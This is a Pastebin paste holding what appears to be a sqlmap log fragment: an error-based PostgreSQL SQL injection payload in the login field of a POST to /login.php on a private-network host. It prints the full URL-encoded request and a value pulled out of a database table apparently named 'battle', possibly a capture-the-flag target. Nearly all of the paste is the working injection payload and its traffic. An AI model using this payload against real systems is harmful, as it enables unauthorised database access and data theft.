Advertisement
Guest User

Untitled

a guest
Oct 31st, 2019
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.35 KB | None | 0 0
  1. [11:25:33] [PAYLOAD] abc' AND 9936=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113))||(SELECT COALESCE(CAST(congratulation AS CHARACTER(10000)),(CHR(32))) FROM public.battle ORDER BY congratulation OFFSET 1 LIMIT 1)::text||(CHR(113)||CHR(112)||CHR(112)||CHR(107)||CHR(113)) AS NUMERIC)-- TjPY
  2. [11:25:33] [TRAFFIC OUT] HTTP request [#3]:
  3. POST /login.php HTTP/1.1
  4. Accept-language: en-US,en;q=0.5
  5. Accept-encoding: gzip, deflate
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  7. User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
  8. Host: 10.218.12.3
  9. Referer: http://10.218.8.3/login.php
  10. Upgrade-Insecure-Requests: 1
  11. Content-type: application/x-www-form-urlencoded
  12. Cookie: PHPSESSID=815300d6c085485917986d089b44193c
  13. Content-length: 480
  14. Connection: close
  15.  
  16. inputLogin=abc%27%20AND%209936%3DCAST%28%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20COALESCE%28CAST%28congratulation%20AS%20CHARACTER%2810000%29%29%2C%28CHR%2832%29%29%29%20FROM%20public.battle%20ORDER%20BY%20congratulation%20OFFSET%201%20LIMIT%201%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20TjPY&inputPassword=qwerty&signin=True
  17.  
  18. [11:25:33] [INFO] retrieved: 0128a870-0bf7-4370-06ab-a4715c19e63e
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement